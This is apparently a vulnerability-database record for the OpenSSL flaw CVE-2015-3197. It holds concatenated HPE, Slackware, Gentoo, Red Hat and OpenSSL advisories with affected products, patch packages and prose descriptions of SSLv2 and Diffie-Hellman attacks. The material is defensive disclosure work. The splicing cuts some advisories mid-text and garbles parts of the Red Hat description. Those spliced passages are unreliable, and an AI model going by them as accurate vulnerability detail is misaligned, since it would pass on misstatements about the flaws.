FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **1950 (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **7500 (Comware 7) - Version: R7183**\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5130HI - Version: R1120P07**\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5510HI - Version: R1120P07**\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **VCX - Version: 9.8.19**\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2015-3197\n \n **Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 14 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1r-i486-1_slack14.1.txz: Upgraded. \n This update fixes the following security issue:\n SSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197). \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1r-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1r-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1r-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2f-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2f-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2f-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2f-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n0d6e8d3b27326c84b9996ed189868eba openssl-1.0.1r-i486-1_slack14.0.txz\ne3cb0b75e9df4be9d8fd1cfcd2fbd306 openssl-solibs-1.0.1r-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n7b52f4a43b42703a6840945d55f503ee openssl-1.0.1r-x86_64-1_slack14.0.txz\neee92cb549bacae21e63bee22b9bb8d4 openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n5be72ab551b2064aa34c83b42a07ff85 openssl-1.0.1r-i486-1_slack14.1.txz\nb28e00a7124822258cfd137ab5ce0572 openssl-solibs-1.0.1r-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n8e0273b1e99e8caa48fcab2547f051e9 openssl-1.0.1r-x86_64-1_slack14.1.txz\n60f3994c35679455cab7a984493d1fdb openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n509771b1f7d58a682feb2099fdf3eb5d a/openssl-solibs-1.0.2f-i586-1.txz\nd72c0188f4223d1dc2d6080f8d99d92e n/openssl-1.0.2f-i586-1.txz\n\nSlackware x86_64 -current packages:\n0c6653d3c37271f9f1a58a8c0e1f7b40 a/openssl-solibs-1.0.2f-x86_64-1.txz\ne4ebd1204644ea58e1779187fe071428 n/openssl-1.0.2f-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1r-i486-1_slack14.1.txz openssl-solibs-1.0.1r-i486-1_slack14.1.txz \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. 5.9 server) - i386, ia64, x86_64\n\n3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201601-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: January 29, 2016\n Bugs: #572854\n ID: 201601-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to disclose sensitive information and complete weak\nhandshakes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2f \u003e= 1.0.2f\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe upstream advisory and CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2f\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-3197\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3197\n[ 2 ] CVE-2016-0701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0701\n[ 3 ] OpenSSL Security Advisory [28th Jan 2016]\n http://openssl.org/news/secadv/20160128.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-05\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl098e security update\nAdvisory ID: RHSA-2016:0372-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0372.html\nIssue date: 2016-03-09\nCVE Names: CVE-2015-0293 CVE-2015-3197 CVE-2016-0703 \n CVE-2016-0704 CVE-2016-0800 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl098e packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nA padding oracle flaw was found in the Secure Sockets Layer version 2.0\n(SSLv2) protocol. An attacker can potentially use this flaw to decrypt\nRSA-encrypted cipher text from a connection using a newer SSL/TLS protocol\nversion, allowing them to decrypt such connections. This cross-protocol\nattack is publicly referred to as DROWN. (CVE-2016-0800)\n\nNote: This issue was addressed by disabling the SSLv2 protocol by default\nwhen using the \u0027SSLv23\u0027 connection methods, and removing support for weak\nSSLv2 cipher suites. For more information, refer to the knowledge base\narticle linked to in the References section. \n\nIt was discovered that the SSLv2 servers using OpenSSL accepted SSLv2\nconnection handshakes that indicated non-zero clear key length for\nnon-export cipher suites. An attacker could use this flaw to decrypt\nrecorded SSLv2 sessions with the server by using it as a decryption \noracle.(CVE-2016-0703)\n\nIt was discovered that the SSLv2 protocol implementation in OpenSSL did\nnot properly implement the Bleichenbacher protection for export cipher\nsuites. An attacker could use a SSLv2 server using OpenSSL as a\nBleichenbacher oracle. \n\nA denial of service flaw was found in the way OpenSSL handled SSLv2\nhandshake messages. This could result in weak\nSSLv2 ciphers being used for SSLv2 connections, making them vulnerable to\nman-in-the-middle attacks. (CVE-2015-3197)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges Nimrod Aviram and Sebastian Schinzel as the original\nreporters of CVE-2016-0800 and CVE-2015-3197; David Adrian (University of\nMichigan) and J. Alex Halderman (University of Michigan) as the original\nreporters of CVE-2016-0703 and CVE-2016-0704; and Sean Burford (Google) and\nEmilia K\u00e4sper (OpenSSL development team) as the original reporters of\nCVE-2015-0293. For the update\nto take effect, all services linked to the openssl098e library must be\nrestarted, or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers\n1301846 - CVE-2015-3197 OpenSSL: SSLv2 doesn\u0027t block disabled ciphers\n1310593 - CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)\n1310811 - CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2\n1310814 - CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nppc64:\nopenssl098e-0.9.8e-20.el6_7.1.ppc.rpm\nopenssl098e-0.9.8e-20.el6_7.1.ppc64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl098e-0.9.8e-20.el6_7.1.s390.rpm\nopenssl098e-0.9.8e-20.el6_7.1.s390x.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.s390.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nppc64:\nopenssl098e-0.9.8e-29.el7_2.3.ppc.rpm\nopenssl098e-0.9.8e-29.el7_2.3.ppc64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc64.rpm\n\ns390x:\nopenssl098e-0.9.8e-29.el7_2.3.s390.rpm\nopenssl098e-0.9.8e-29.el7_2.3.s390x.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.s390.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.s390x.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-0293\nhttps://access.redhat.com/security/cve/CVE-2015-3197\nhttps://access.redhat.com/security/cve/CVE-2016-0703\nhttps://access.redhat.com/security/cve/CVE-2016-0704\nhttps://access.redhat.com/security/cve/CVE-2016-0800\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/2176731\nhttps://drownattack.com/\nhttps://openssl.org/news/secadv/20160128.txt\nhttps://openssl.org/news/secadv/20160301.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFW36N0XlSAg2UNWIIRAqYBAJ98/98OOTx9c6LlkPHMl7SfneXccQCfX2LY\nBQ+47lH1uQT1a3RxlYkETOk=\n=TqD1\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. OpenSSL Security Advisory [28th Jan 2016]\n=========================================\n\nNOTE: SUPPORT FOR VERSION 1.0.1 WILL BE ENDING ON 31ST DECEMBER 2016. NO\nSECURITY FIXES WILL BE PROVIDED AFTER THAT DATE. UNTIL THAT TIME SECURITY FIXES\nONLY ARE BEING APPLIED. \n\nDH small subgroups (CVE-2016-0701)\n==================================\n\nSeverity: High\n\nHistorically OpenSSL usually only ever generated DH parameters based on \"safe\"\nprimes. More recently (in version 1.0.2) support was provided for generating\nX9.42 style parameter files such as those required for RFC 5114 support. The\nprimes used in such files may not be \"safe\". Where an application is using DH\nconfigured with parameters based on primes that are not \"safe\" then an attacker\ncould use this fact to find a peer\u0027s private DH exponent. This attack requires\nthat the attacker complete multiple handshakes in which the peer uses the same\nprivate DH exponent. For example this could be used to discover a TLS server\u0027s\nprivate DH exponent if it\u0027s reusing the private DH exponent or it\u0027s using a\nstatic DH ciphersuite. \n\nOpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. \nIt is not on by default. If the option is not set then the server reuses the\nsame private DH exponent for the life of the server process and would be\nvulnerable to this attack. It is believed that many popular applications do set\nthis option and would therefore not be at risk. \n\nOpenSSL before 1.0.2f will reuse the key if:\n- SSL_CTX_set_tmp_dh()/SSL_set_tmp_dh() is used and SSL_OP_SINGLE_DH_USE is not\n set. \n- SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used, and both the\n parameters and the key are set and SSL_OP_SINGLE_DH_USE is not used. This is\n an undocumted feature and parameter files don\u0027t contain the key. \n- Static DH ciphersuites are used. The key is part of the certificate and\n so it will always reuse it. This is only supported in 1.0.2. \n\nIt will not reuse the key for DHE ciphers suites if:\n- SSL_OP_SINGLE_DH_USE is set\n- SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used and the\n callback does not provide the key, only the parameters. The callback is\n almost always used like this. \n\nNon-safe primes are generated by OpenSSL when using:\n- genpkey with the dh_rfc5114 option. This will write an X9.42 style file\n including the prime-order subgroup size \"q\". This is supported since the 1.0.2\n version. Older versions can\u0027t read files generated in this way. \n- dhparam with the -dsaparam option. This has always been documented as\n requiring the single use. \n\nThe fix for this issue adds an additional check where a \"q\" parameter is\navailable (as is the case in X9.42 based parameters). This detects the\nonly known attack, and is the only possible defense for static DH ciphersuites. \nThis could have some performance impact. \n\nAdditionally the SSL_OP_SINGLE_DH_USE option has been switched on by default\nand cannot be disabled. This could have some performance impact. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\n\nOpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42\nbased parameters. It is possible to generate parameters using non \"safe\" primes,\nbut this option has always been documented as requiring single use and is not\nthe default or believed to be common. However, as a precaution, the\nSSL_OP_SINGLE_DH_USE change has also been backported to 1.0.1r. \n\nThis issue was reported to OpenSSL on 12 January 2016 by Antonio Sanso (Adobe). \nThe fix was developed by Matt Caswell of the OpenSSL development team\n(incorporating some work originally written by Stephen Henson of the OpenSSL\ncore team). \n\nSSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197)\n====================================================\n\nSeverity: Low\n\nA malicious client can negotiate SSLv2 ciphers that have been disabled on the\nserver and complete SSLv2 handshakes even if all SSLv2 ciphers have been\ndisabled, provided that the SSLv2 protocol was not also disabled via\nSSL_OP_NO_SSLv2. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\nOpenSSL 1.0.1 users should upgrade to 1.0.1r\n\nThis issue was reported to OpenSSL on 26th December 2015 by Nimrod Aviram and\nSebastian Schinzel. The fix was developed by Nimrod Aviram with further\ndevelopment by Viktor Dukhovni of the OpenSSL development team. \n\n\nAn update on DHE man-in-the-middle protection (Logjam)\n====================================================================\n\nA previously published vulnerability in the TLS protocol allows a\nman-in-the-middle attacker to downgrade vulnerable TLS connections\nusing ephemeral Diffie-Hellman key exchange to 512-bit export-grade\ncryptography. This vulnerability is known as Logjam\n(CVE-2015-4000). OpenSSL added Logjam mitigation for TLS clients by\nrejecting handshakes with DH parameters shorter than 768 bits in\nreleases 1.0.2b and 1.0.1n. \n\nThis limit has been increased to 1024 bits in this release, to offer\nstronger cryptographic assurance for all TLS connections using\nephemeral Diffie-Hellman key exchange. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\nOpenSSL 1.0.1 users should upgrade to 1.0.1r\n\nThe fix was developed by Kurt Roeckx of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are\nadvised to upgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions\nare no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160128.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-3197" }, { "db": "CERT/CC", "id": "VU#257823" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "BID", "id": "82237" }, { "db": "BID", "id": "74491" }, { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "PACKETSTORM", "id": "136213" }, { "db": "PACKETSTORM", "id": "141101" }, { "db": "PACKETSTORM", "id": "135596" }, { "db": "PACKETSTORM", "id": "136032" }, { "db": "PACKETSTORM", "id": "135515" }, { "db": "PACKETSTORM", "id": "136034" }, { "db": "PACKETSTORM", "id": "136132" }, { "db": "PACKETSTORM", "id": "169661" } ], "trust": 3.69 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3197", "trust": 3.9 }, { "db": "CERT/CC", "id": "VU#257823", "trust": 3.6 }, { "db": "BID", "id": "82237", "trust": 2.0 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "SECTRACK", "id": "1034849", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU95668716", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006985", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201602-026", "trust": 0.6 }, { "db": "CERT/CC", "id": "VU#583776", "trust": 0.3 }, { "db": "MCAFEE", "id": "SB10203", "trust": 0.3 }, { "db": "BID", "id": "74491", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-3197", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136213", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141101", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135596", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136032", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135515", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136034", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136132", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169661", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#257823" }, { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "BID", "id": "82237" }, { "db": "BID", "id": "74491" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "PACKETSTORM", "id": "136213" }, { "db": "PACKETSTORM", "id": "141101" }, { "db": "PACKETSTORM", 